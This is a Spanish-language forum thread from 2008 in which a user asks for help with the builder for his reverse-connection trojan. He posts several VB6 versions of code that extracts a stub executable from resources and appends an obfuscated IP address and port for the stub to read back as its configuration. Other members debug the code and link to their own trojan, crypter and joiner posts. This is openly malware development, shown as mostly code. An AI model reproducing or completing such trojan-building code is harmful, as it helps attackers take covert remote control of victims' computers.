elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Obtener datos de un ejecutable
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Obtener datos de un ejecutable  (Leído 3,939 veces)
aaronduran2


Desconectado Desconectado

Mensajes: 790



Ver Perfil WWW
Obtener datos de un ejecutable
« en: 17 Septiembre 2008, 22:49 pm »

Hola. Estoy diseñando el editor de servidor de mi troyano. Al ser de conexión inversa, en el servidor tiene que figurar la dirección IP y el puerto al que se debe conectar. Utilizo este código para crearlo:

Código
  1. '#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
  2. '    //CargarRes//
  3. '#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
  4. '   Extraer archivo de los recursos.
  5. '#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
  6. Public Sub CargarRes(NumRES As Integer, RutaCopy As String)
  7.    Dim File() As Byte
  8.    If Dir(RutaCopy) = "" Then
  9.        File = LoadResData(NumRES, "CUSTOM")
  10.        Open RutaCopy For Binary Access Write As #1
  11.            Put #1, , File
  12.        Close #1
  13.    End If
  14. End Sub
  15.  
  16. '#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
  17. '    //cmdCrearServidor_Click//
  18. '#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
  19. Private Sub cmdCrearServidor_Click()
  20.    If txtPuerto.Text > 65535 Then
  21.        MsgBox "El puerto debe ser inferior a 65535"
  22.        Exit Sub
  23.    End If
  24.    cd.Filter = "Archivos ejecutables|*.exe"
  25.    cd.DialogTitle = "Generar servidor..."
  26.    cd.ShowSave
  27.    Ruta = cd.FileName
  28.    Call CargarRes(102, cd.FileName)
  29.    Open Ruta For Binary As #1
  30.        Put #1, LOF(1) + 1, txtDireccionIP.Text
  31.        Put #1, , "|"
  32.        Put #1, , txtPuerto.Text
  33.    Close #1
  34. End Sub

Y este es el que lee los datos:

Código
  1. '#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
  2. '    //LeerDatos//
  3. '#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
  4. '   Leer datos del servidor.
  5. '#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
  6. Dim DireccionIP As String * 15
  7. Dim Puerto As String * 5
  8. Dim Secuencia As String * 30
  9.  
  10. Public Function LeerDatos()
  11.    Dim Secuencia As String * 30
  12.    Open App.Path & "\" & App.EXEName & ".exe" For Binary As #1
  13.        Get #1, LOF(1) - 34, DireccionIP
  14.        Get #1, , Secuencia
  15.        Get #1, , Puerto
  16.    Close #1
  17.    MsgBox DireccionIP & "|" & Puerto
  18. End Function
  19.  

Pero no soy capaz de hacer que lea los datos. La caja de mensaje me aparece vacía. ¿Alguien me puede decir como lo hago?

Gracias de antemano.


« Última modificación: 17 Septiembre 2008, 22:55 pm por aaronduran2 » En línea

cobein


Desconectado Desconectado

Mensajes: 759



Ver Perfil WWW
Re: Obtener datos de un ejecutable
« Respuesta #1 en: 18 Septiembre 2008, 13:00 pm »

Yo deje u code hace unos dias, miralo que ahi tenes la respuesta

http://foro.elhacker.net/programacion_vb/cryptosy_src-t227118.0.html

Sino busca que hay muuuuchos ejemplos de como hacerlo, por lo pronto te digo que parece que estas pisando los datos.


En línea

http://www.advancevb.com.ar
Más Argentino que el morcipan
Aguante el Uvita tinto, Tigre, Ford y seba123neo
Karcrack es un capo.
aaronduran2


Desconectado Desconectado

Mensajes: 790



Ver Perfil WWW
Re: Obtener datos de un ejecutable
« Respuesta #2 en: 18 Septiembre 2008, 15:52 pm »

Estuve probando con tu ejemplo pero el ejecutable final me queda inservible. Lo que necesito es guardar la dirección IP, un separador (por ejemplo "|") y el puerto, y luego que el servidor se lea a sí mismo y obtenga los datos. Pero no soy capaz.

Saludos.
En línea

yovaninu


Desconectado Desconectado

Mensajes: 349



Ver Perfil
Re: Obtener datos de un ejecutable
« Respuesta #3 en: 18 Septiembre 2008, 17:19 pm »

Uff que recuerdo de mi primer Joinner, y aun lo sigo usando he! un poco mejorado claro, echale un vistazo se que lo entenderas, aqui esta el viejo post

http://foro.elhacker.net/programacion_vb/mi_primer_troyano_en_vb60-t170445.0.html;msg825373#msg825373
En línea

aaronduran2


Desconectado Desconectado

Mensajes: 790



Ver Perfil WWW
Re: Obtener datos de un ejecutable
« Respuesta #4 en: 18 Septiembre 2008, 17:59 pm »

@yovaninu

No soy capaz de hacerlo funcionar. Siempre me muestra datos equivocados. Probé a quitarle la cifrado y también falla. Si tuvieses un ejemplo sencillo, te lo agradecería.

Saludos.
« Última modificación: 18 Septiembre 2008, 18:01 pm por aaronduran2 » En línea

yovaninu


Desconectado Desconectado

Mensajes: 349



Ver Perfil
Re: Obtener datos de un ejecutable
« Respuesta #5 en: 18 Septiembre 2008, 20:30 pm »

@yovaninu

No soy capaz de hacerlo funcionar. Siempre me muestra datos equivocados. Probé a quitarle la cifrado y también falla. Si tuvieses un ejemplo sencillo, te lo agradecería.

Saludos.
si dices el error, de seguro que lo solucionamos

lo de la mini encriptacion es simple, no le afecta en nada, no deberias tener problemas con ese codigo
En línea

aaronduran2


Desconectado Desconectado

Mensajes: 790



Ver Perfil WWW
Re: Obtener datos de un ejecutable
« Respuesta #6 en: 18 Septiembre 2008, 20:33 pm »

A ver, tengo dos campos de texto con la dirección IP y el puerto y utilizo el siguiente código:
Código
  1. Private Sub cmdCrearServidor_Click()
  2.    Dim TamañoIP As String, TamañoPuerto As String, TamañoFirma As String, TamañoTotal As String
  3.    Dim DatosEncriptados As String
  4.    If txtPuerto.Text > 65535 Then
  5.        MsgBox "El puerto debe ser inferior a 65535"
  6.        Exit Sub
  7.    End If
  8.    cd.Filter = "Archivos ejecutables|*.exe"
  9.    cd.DialogTitle = "Generar servidor..."
  10.    cd.ShowSave
  11.    Ruta = cd.FileName
  12.    Call CargarRes(102, cd.FileName)
  13.    DireccionIP = txtIP.Text
  14.    Puerto = txtPuerto.Text
  15.    Firma = "Editado"
  16.    DatosEncriptados = Trim$(Puerto) & "|" & Trim$(DireccionIP) & "|" & Trim$(Firma) & "|"
  17.    DatosEncriptados = cifrar(DatosEncriptados)
  18.    TamañoIP = Len(DireccionIP): TamañoPuerto = Len(Puerto): TamañoFirma = Len(Firma)
  19.    TamañoTotal = TamañoIP + TamañoPuerto + TamañoFirma
  20.    Open Ruta For Binary As #1
  21.        Seek (1), LOF(1) + 1
  22.        Put #1, , DatosEncriptados & Trim(Str(TamañoTotal))
  23.    Close #1
  24. End Sub
  25.  

Y en el servidor tengo esto:

Código
  1. Public Function LeerDatos()
  2.    Dim DatosLeer As String
  3.    Dim DatosSeparados As Variant
  4.    Dim DatosDesencriptados As String
  5.    Dim nd, nd1 As String
  6.    Open App.Path & "\" & App.EXEName & ".exe" For Binary As #2
  7.        DatosLeer = Input(LOF(2), #2)
  8.    Close #2
  9.    MsgBox DatosLeer
  10.    nd = Right(DatosLeer, 2)
  11.    MsgBox nd
  12.    nd1 = Right(DatosLeer, Val(nd) + 5)
  13.    MsgBox nd1
  14.    DatosDesencriptados = descifrar(nd1)
  15.    DatosSeparados = Split(DatosDesencriptados, "|")
  16.    DireccionIP = DatosSeparados(0)
  17.    Puerto = Val(DatosSeparados(1))
  18. End Function
  19.  

Puse MsgBox nd y MsgBox nd1 para ver lo que mostraba antes de hacer el proceso completo. No me funciona. Espero poder solucionarlo. Además, quería añadirles más cosas para guardar en el ejecutable, como el tipo de inicio, etc...

Saludos.
En línea

aaronduran2


Desconectado Desconectado

Mensajes: 790



Ver Perfil WWW
Re: Obtener datos de un ejecutable
« Respuesta #7 en: 18 Septiembre 2008, 22:59 pm »

Yo había hecho este código, pero el servidor no me lee nada.

En el editor:

Código
  1. Open Ruta For Binary As #1
  2.    Put #1, LOF(1) + 1, "|" & DireccionIP & "|" & Puerto
  3.    Put #1, , Secuencia
  4. Close #1

En el servidor:

Código
  1. Dim Datos As String
  2. Dim DatosSeparados As Variant
  3. Dim Secuencia As String
  4. Open App.Path & "\" & App.EXEName & ".exe" For Binary As #1
  5.    Get #1, LOF(1), Datos
  6.    Get #1, , Secuencia
  7. Close #1

Los datos están cifrados. Accedo con el Hex Workshop al archivo creado y veo los datos, pero después no soy capaz de hacer que el servidor los lea. Si alguien me puede ayudar...

Saludos.
En línea

cobein


Desconectado Desconectado

Mensajes: 759



Ver Perfil WWW
Re: Obtener datos de un ejecutable
« Respuesta #8 en: 19 Septiembre 2008, 01:24 am »

Asi no vas a llegar muy lejos, mejor lee un manual de como leer y escribir archivos.
En línea

http://www.advancevb.com.ar
Más Argentino que el morcipan
Aguante el Uvita tinto, Tigre, Ford y seba123neo
Karcrack es un capo.
s E t H

Desconectado Desconectado

Mensajes: 152


Ha tenido un sueño donde todos los pollos eran libres de cruzar una carretera sin tener que justificar sus actos.


Ver Perfil WWW
Re: Obtener datos de un ejecutable
« Respuesta #9 en: 19 Septiembre 2008, 02:29 am »

probaste usar el debuguer de vb6?

creo que al leer con "    Get #1, LOF(1), Datos" lees todo el archivo, y en Secuencia no te queda nada.. debuguea y fijate
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Loguear en Web y obtener datos
Java
Nobody12 1 2,442 Último mensaje 23 Octubre 2011, 21:34 pm
por Leyer
obtener datos de una web
Hacking
jadsera 4 3,901 Último mensaje 14 Enero 2012, 18:21 pm
por H1tchclock
obtener datos de un juego DLL
Programación C/C++
rgff 2 2,667 Último mensaje 12 Mayo 2012, 02:30 am
por david_BS
Httpclient obtener datos de la web del Seniat
Java
JNell 2 5,245 Último mensaje 13 Marzo 2014, 20:44 pm
por neomatrix14
Obtener datos de la sbs « 1 2 »
Programación Visual Basic
dany22_ 10 3,730 Último mensaje 3 Julio 2015, 17:18 pm
por dany22_
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines